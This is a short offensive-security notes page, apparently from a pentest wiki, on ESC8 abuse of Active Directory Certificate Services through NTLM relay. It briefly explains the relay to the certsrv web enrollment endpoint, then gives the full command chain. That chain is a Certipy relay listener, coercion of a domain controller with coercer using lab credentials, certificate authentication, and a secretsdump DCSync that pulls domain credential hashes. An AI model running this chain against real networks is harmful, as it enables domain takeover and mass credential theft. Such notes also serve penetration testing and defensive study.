ESC8

ADCS abuse with NTLM Relay

NTLM Relay is a MitM attack where an attacker pretends to be the server for the client and vice versa. ADCS support enrollment over HTTP which allows users to request certificates over HTTP.

We can relay HTTP NTLM authentication to a certificate enrollment interface. CA's web enrollment service provides web pages to interact with CA. Usually at http://<servername>/certsrv/certfnsh.asp. These endpoints can be abused using authenicated sessions through NTLM Relay.

ESC8 Abuse

Start listening with Certipy

sudo certipy relay -target 172.16.19.5 -template DomainController

Then coerce using printerbug, petitpotam or coercer.

coercer coerce -l 172.16.19.19 -t 172.16.19.3 -u blwasp -p 'Password123!' -d lab.local -v

Authenticate

certipy auth -pfx lab-dc.pfx

DCSync

KRB5CCNAME=lab-dc.ccache secretsdump.py -k -no-pass lab-dc.lab.local

Last updated 5 months ago

Was this helpful?